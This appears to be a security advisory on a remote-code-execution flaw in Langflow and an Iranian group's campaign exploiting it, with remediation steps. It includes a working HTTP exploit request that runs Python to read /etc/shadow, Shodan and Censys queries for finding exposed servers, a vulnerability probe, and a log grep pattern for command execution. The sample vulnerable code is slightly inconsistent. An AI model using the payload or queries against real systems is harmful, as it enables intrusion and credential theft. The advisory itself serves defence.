Langflow CVE-2025-34291 — MuddyWater Exploiting AI Orchestration

CVE-2025-34291 — Origin Validation Error in Langflow

CVE ID: CVE-2025-34291
CVSS Score: 9.4 (Critical)
CISA KEV: 2026-05-21 — Confirmed active exploitation
Affected Product: Langflow — open-source AI workflow orchestration platform
Affected Versions: All versions prior to the May 2026 patch
Attack Vector: Network — remotely exploitable, no auth required
User Interaction: None
MITRE ATT&CK: T1190 (Exploit Public-Facing Application), T1078 (Valid Accounts), T1040 (Network Sniffing)

Vulnerability Mechanics

CVE-2025-34291 is an origin validation error in Langflow's HTTP API layer. The vulnerability allows an unauthenticated remote attacker to execute arbitrary Python code on the Langflow server by crafting HTTP requests that bypass the platform's origin-based access controls.

Langflow's architecture serializes workflow configurations as JSON sent to /api/v1/flow/execute. The backend deserializes this and executes node operations — including arbitrary Python code execution via "Custom Component" and "Python Function" node types. The origin validator only checks for the presence of an Origin header, not its value. Attackers send requests without an Origin header or with Origin: null, bypassing the guard entirely.

Specific vulnerable code path:

class OriginValidator:
    ALLOWED_ORIGINS = ["https://app.langflow.io", "http://localhost:3000"]

    def validate(self, request):
        origin = request.headers.get("Origin")
        # BUG: origin can be None — no guard
        if origin in self.ALLOWED_ORIGINS or "langflow" in origin:
            return True
        return True  # Default allow when no Origin header present

Exploit payload:

POST /api/v1/flow/execute HTTP/1.1
Host: victim-langflow.internal:7860
Content-Type: application/json

{
  "id": "exploit-flow",
  "nodes": [{
    "id": "payload-1",
    "type": "PythonFunction",
    "data": {
      "code": "import os; import subprocess; result = subprocess.run(['cat', '/etc/shadow'], capture_output=True, text=True); return {'output': result.stdout}"
    }
  }],
  "edges": []
}

MuddyWater Campaign — Tactics and Infrastructure

MuddyWater (SeedWorm, TEMP.Zagros, Cobalt Ulster) is an Iranian state-sponsored espionage group linked to Iran's MOIS, active since 2017. The exploitation of CVE-2025-34291 represents a significant tactical shift from their traditional spear-phishing methodology toward targeting AI infrastructure.

Campaign Timeline

• 2026-05-10: Early exploitation detected — anomalous API calls to /api/v1/flow/execute from MuddyWater-linked IP ranges hitting Israeli and Saudi academic networks.
• 2026-05-14: CVE publicly assigned. PoC circulates in Telegram.
• 2026-05-15: MuddyWater scales scanning. Shodan query http.title:"Langflow" shows increased reconnaissance.
• 2026-05-17: CISA notified of confirmed exploitation against US defense contractors.
• 2026-05-21: CISA adds to KEV catalog under BOD 22-01.
• 2026-05-26: Campaign ongoing — several dozen confirmed compromises.

Post-Exploitation

1. Credential harvesting: env output scraped for API keys (OpenAI, Anthropic, AWS, Azure) stored as environment variables.
2. Token exfiltration: .env files, ~/.config/langflow/config.yaml, mounted secrets directories read and exfiltrated.
3. Persistence: Python-based POWERSTATS variant written to Langflow workflows directory.
4. Lateral movement: Compromised instance used as pivot for internal network scanning using harvested tokens.

AI Infrastructure Attack Surface

Langflow is often deployed by data science teams without platform engineering security controls, creating dangerous exposure patterns:

# Shodan
http.title:"Langflow" port:7860

# Censys
services.http.response.html_title: "Langflow" and services.port: 7860

CISA KEV Response — Timeline and Impact

CISA added CVE-2025-34291 to the KEV catalog on 2026-05-21, triggering BOD 22-01 requirements for federal agencies: remediation within 7 days (due 2026-05-28). Required action: apply vendor patch or isolate affected systems.

# Check if vulnerable
curl -s -o /dev/null -w "%{http_code}" \
  -X POST http://localhost:7860/api/v1/flow/execute \
  -H "Content-Type: application/json" \
  -d '{"id":"test","nodes":[],"edges":[]}'

# 200 = vulnerable; 401/403 = auth enforced

Technical Remediation

Immediate (First Hour)

1. Isolate: Remove public network access to port 7860. aws ec2 revoke-security-group-ingress --group-id sg-xxxxx --protocol tcp --port 7860 --cidr 0.0.0.0/0
2. Patch: pip install --upgrade langflow or pull latest Docker image.
3. Rotate all credentials: Every API key and token stored in the Langflow environment.

Short-Term (First Week)

1. Enable authentication: LANGFLOW_AUTH_TYPE=basic with bcrypt-hashed password.
2. Deploy WAF rule: SecRule REQUEST_URI "^/api/v1/flow/execute" "phase:1,deny,status:403"
3. Audit logs for compromise: grep -r "subprocess\|os\.system\|eval\|exec\|__import__" /var/log/langflow/*.log
4. Deploy YARA rule for MuddyWater backdoor (POWERSTATS variant in workflows directory).

Long-Term (Next Month)

1. Network segmentation: Langflow in isolated VPC, reverse proxy with mandatory auth.
2. Credentials management: Use secrets manager (Vault, AWS Secrets Manager) — no env vars for API keys.
3. SBOM-driven vulnerability management: Langflow in your software bill of materials tracking.

Bottom Line

CVE-2025-34291 (CVSS 9.4) — critical origin validation RCE in Langflow, actively exploited by Iranian state-sponsored MuddyWater for initial access and credential exfiltration. CISA KEV confirmed May 21, 2026. Isolate, patch, audit, rotate. The API keys stored on the compromised server grant access to your entire LLM provider footprint.